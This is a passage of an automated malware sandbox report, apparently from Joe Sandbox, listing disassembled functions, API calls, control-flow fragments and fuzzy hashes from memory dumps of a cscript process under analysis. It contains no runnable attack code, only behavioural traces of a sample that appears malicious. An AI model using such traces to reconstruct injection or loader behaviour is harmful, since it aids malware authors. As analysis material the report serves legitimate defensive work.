                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 312 301a6aa-301a6ac 313 301a679-301a687 call 301af60 312->313 314 301a6ae-301a6dc call 301af60 312->314 318 301a68c-301a6a1 RtlFreeHeap 313->318
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03003AF8), ref: 0301A69D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                        • String ID: .z`
                                                                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                                                                        • Opcode ID: be6c27d1feec457bc969d19b3608f641ea7a76b691fc5f59a063ecaea79b291a
                                                                                                                                                                                                        • Instruction ID: cc6bfd507be4f9ca4e936013084faa2f3b2b5b3463f023895c4f431286a6274a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: be6c27d1feec457bc969d19b3608f641ea7a76b691fc5f59a063ecaea79b291a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BF081B17412146FD720DFA4CC45FDB3768EF847A0F108169F91C9B281C631E515CAE0
                                                                                                                                                                                                        Function 0301A662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 323 301a662-301a687 call 301af60 326 301a68c-301a6a1 RtlFreeHeap 323->326
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03003AF8), ref: 0301A69D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                        • String ID: .z`
                                                                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                                                                        • Opcode ID: bd6d8063d210d9657da92bdbe044f09ebe648b33cd7a801f493260ca015dd881
                                                                                                                                                                                                        • Instruction ID: 0482b779bcaac4344183d6e2a140fa57f7a784d2352f24dcf669164385eaa3f3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd6d8063d210d9657da92bdbe044f09ebe648b33cd7a801f493260ca015dd881
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70E0A0B62411046BC714CF75CC84ED73B28EF85260F204148F90997241C932D908CAA0
                                                                                                                                                                                                        Function 0301A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 327 301a670-301a6a1 call 301af60 RtlFreeHeap
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03003AF8), ref: 0301A69D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                        • String ID: .z`
                                                                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                        • Instruction ID: 7165da9534c069eb6d829234b0573c7e272cc5194d48e0682ada0242b35843e2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9E012B5200208ABDB18EF99CC48EA777ACEF88660F118558FA085B241C630E9108AB0
                                                                                                                                                                                                        Function 03008310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 331 3008310-300831f 332 3008328-300835a call 301ca00 call 300acf0 call 3014e50 331->332 333 3008323 call 301be60 331->333 340 300835c-300836e PostThreadMessageW 332->340 341 300838e-3008392 332->341 333->332 342 3008370-300838b call 300a480 PostThreadMessageW 340->342 343 300838d 340->343 342->343 343->341
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0300836A
                                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0300838B
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                        • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                                                                                                                                        • Instruction ID: f54b71b3e6f06b617c0aa25297874bfe4c9a41f2be8bb94b51db7b170c32e7c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED01A735A8132877F721E6949C42FFE776C6B80F50F054154FF04BE1C1EA94691546F5
                                                                                                                                                                                                        Function 0300ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 541 300acf0-300ad0c 542 300ad14-300ad19 541->542 543 300ad0f call 301cc50 541->543 545 300ad1b-300ad1e 542->545 546 300ad1f-300ad2d call 301d070 542->546 543->542 549 300ad3d-300ad4e call 301b4a0 546->549 550 300ad2f-300ad3a call 301d2f0 546->550 555 300ad50-300ad64 LdrLoadDll 549->555 556 300ad67-300ad6a 549->556 550->549 555->556
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0300AD62
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Load
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                                                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                                                        • Instruction ID: 913d97646d617bfa293b5c39ad4a5833eeb87a58702c9a62b039c46d709df41b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF0121B9E4120DBBEF10DBE4DC41FEDB3B89B54608F044595E9199B280F631EB14CB91
                                                                                                                                                                                                        Function 0301A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 557 301a6e0-301a738 call 301af60 CreateProcessInternalW
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0301A734
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                        • Instruction ID: 98e62a13916e0f10a64ee408331e0191abeb13a2f0cae02423cb7351c27f9793
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4701B2B2211208BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                                                                                                                                                        Function 030191A3 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0300F050,?,?,00000000), ref: 030191EC
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                                        • Opcode ID: e77c83cb1131cef44361fac56b600d869413f29bcb991ce2bfa0f051c13e034f
                                                                                                                                                                                                        • Instruction ID: e9037e7206ba1c8f7a8da6f087998b6b6c6865c1aeda13abca922f0899092b6b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e77c83cb1131cef44361fac56b600d869413f29bcb991ce2bfa0f051c13e034f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF0A07A6813047BD330AA598C02FD7B6E99B91F54F590129F619EB2C0EBA6F41142D4
                                                                                                                                                                                                        Function 030191B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0300F050,?,?,00000000), ref: 030191EC
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                                        • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                                                                                                                                                        • Instruction ID: 759718124d05745df2b79654a5b75f92e7623e8157044e5948546104f84b3f4d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFE06D7B3813043AE330A599AC02FE7B29C8BC1B20F150026FA0DEA2C0D995F41142A4
                                                                                                                                                                                                        Function 0300F6C7 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,03008D14,?), ref: 0300F6FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                        • Opcode ID: a589094f4c8c92731364c6586b32332e92142f41525403776c7e97f639c8214b
                                                                                                                                                                                                        • Instruction ID: 1f572b729bb983f1cd0c95258e64bef32f30284aa8c2d6b340926350625250e8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a589094f4c8c92731364c6586b32332e92142f41525403776c7e97f639c8214b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BEF0E976A812082AFB20EA54DC42FF673ACEB94714F054098F40CDB2D2E6A0D5414561
                                                                                                                                                                                                        Function 0301A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0300F1D2,0300F1D2,?,00000000,?,?), ref: 0301A800
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                        • Instruction ID: dbd485406890450d25c7f6561f2e790932834ddf4354128d30b87bf32d7ed4c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6E01AB52002086BDB10DF89CC84EE737ADEF88650F118154FA0C5B241C930E8108BF5
                                                                                                                                                                                                        Function 0301A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(03014536,?,03014CAF,03014CAF,?,03014536,?,?,?,?,?,00000000,00000000,?), ref: 0301A65D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                        • Instruction ID: e0fca9a95f83d454cf5af7c11cecd9a3f74b734db2dc3448643e00647d4a9722
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBE012B5201208ABDB14EF99CC40EA777ACEF88664F118558FA085B241C630F9108AB0
                                                                                                                                                                                                        Function 0300F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,03008D14,?), ref: 0300F6FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_3000000_cscript.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                        • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                                                        • Instruction ID: 417b52d5f4595631120d2193735d9f6bdc858d18d6655d2c84645b21d72cb001
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9ED05E656503092AE620EAA59C02F6672C85B44A04F490064F9489A2C3D950E0004165
                                                                                                                                                                                                        Function 051F2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_5180000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: a48eb2b41e68b5496b684eb2ebefb4591a5a9d9f64048ec102b4c960ae767f1b
                                                                                                                                                                                                        • Instruction ID: 1e44c1b9ea63ed267dd412a8892a7933bf1f2b15e955893a1303aa0c2a69befb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a48eb2b41e68b5496b684eb2ebefb4591a5a9d9f64048ec102b4c960ae767f1b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BB092729028C9CAEB11EB604B48B2B7A52BBD0702F66C466E6560685F8778C491F276

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 00407490 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 220registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?,00000000,00000000), ref: 0040750C
                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,?), ref: 00407536
                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00407565
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00407576
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00407587
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000), ref: 0040F7C8
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,?,00000000,00000000), ref: 0040F7FB
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,00000000,00000000), ref: 0040F81E
                                                                                                                                                                                                        • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 0040F87F
                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,00000100), ref: 0040F8A1
                                                                                                                                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 0040F8D1
                                                                                                                                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,?), ref: 0040F93E
                                                                                                                                                                                                        • ReportEventW.ADVAPI32(?,00000010,00000000,C0FF03E8,00000000,00000001,00000000,?,00000000), ref: 0040F9AB
                                                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(?), ref: 0040F9B2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: EventNameOpen$AccountByteCharCloseLookupMultiSourceWide$DeregisterFreeRegisterReportStringUser
                                                                                                                                                                                                        • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                                                                                                                                                                        • API String ID: 2267583055-2261343319
                                                                                                                                                                                                        • Opcode ID: 0e8c44b9183b7c76373f81c9df40596d2059af36b8a8c70c5e3c2541c5d96258
                                                                                                                                                                                                        • Instruction ID: f1563035850acd2fad1872510ea165082c65c5e55b6890ae512f6dcfdf4bb9fd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e8c44b9183b7c76373f81c9df40596d2059af36b8a8c70c5e3c2541c5d96258
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03816271A41218BBDB309F619C4DFEA7B78AB08704F1041B6B509B62D1DB78AE84CF59
                                                                                                                                                                                                        Function 0040BCDF Relevance: 16.6, APIs: 11, Instructions: 126memorywindowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0040B95E,?), ref: 0040BD1E
                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0040BD2F
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,0040B95E,?), ref: 0040BD51
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,0040B95E,?), ref: 004114B1
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 004114D8
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 004114FF
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 0041151B
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 0041152E
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 00411543
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0040B95E,?), ref: 0041155D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocFormatLocalMessage$ErrorFreeLastString
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 423131097-0
                                                                                                                                                                                                        • Opcode ID: 0f6f0b130dab8e04802e2304999ed6d4898a9f83e54a6ed61de0bc91e12daa77
                                                                                                                                                                                                        • Instruction ID: 3b2fc3b716e7a9c05bb6e02d402eeeacfbf4a81c1beaf203865e465d7c60d9de
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f6f0b130dab8e04802e2304999ed6d4898a9f83e54a6ed61de0bc91e12daa77
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB413471901125BBDB215F569C08EEFBF7CEF45761F108126F915A12A0DB388950CAFD
                                                                                                                                                                                                        Function 0040CD6C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 564comCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CoCreateInstance.OLE32(0040373C,00000000,00000001,004037AC,?,00000000,00000000,?), ref: 0040CDE6
                                                                                                                                                                                                        • CoCreateInstance.OLE32(0040374C,00000000,00000001,004037AC,?), ref: 0040CDFA
                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407E84,00000000), ref: 0040CE11
                                                                                                                                                                                                        • CoGetClassObject.OLE32(0040376C,00000001,00000000,0040375C,?), ref: 0040CEB7
                                                                                                                                                                                                        • CreateBindCtx.OLE32(00000000,00000000), ref: 0040D062
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_cscript.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Create$Instance$BindClassDefaultObjectUser
                                                                                                                                                                                                        • String ID: WSH$WScript
                                                                                                                                                                                                        • API String ID: 1420412123-1019903269
                                                                                                                                                                                                        • Opcode ID: b4a60d2ac2569a0893e9882f25688816e98441a4bcc7eccbe0e22bb52b3f2292
                                                                                                                                                                                                        • Instruction ID: a63f95ab15df632737a4d707f1054108aa74badec750ffc5d0f3a579e6d0fe09
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4a60d2ac2569a0893e9882f25688816e98441a4bcc7eccbe0e22bb52b3f2292
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C12A5B0B01205DFD7149F95E894B6E7BB6AF88310F15447AE502BB3E1CF79AC418B89
                                                                                                                                                                                                        Function 0040DC00 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0040DC2D
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040DC3C
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040DC45
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0040DC4E
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0040DC63
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
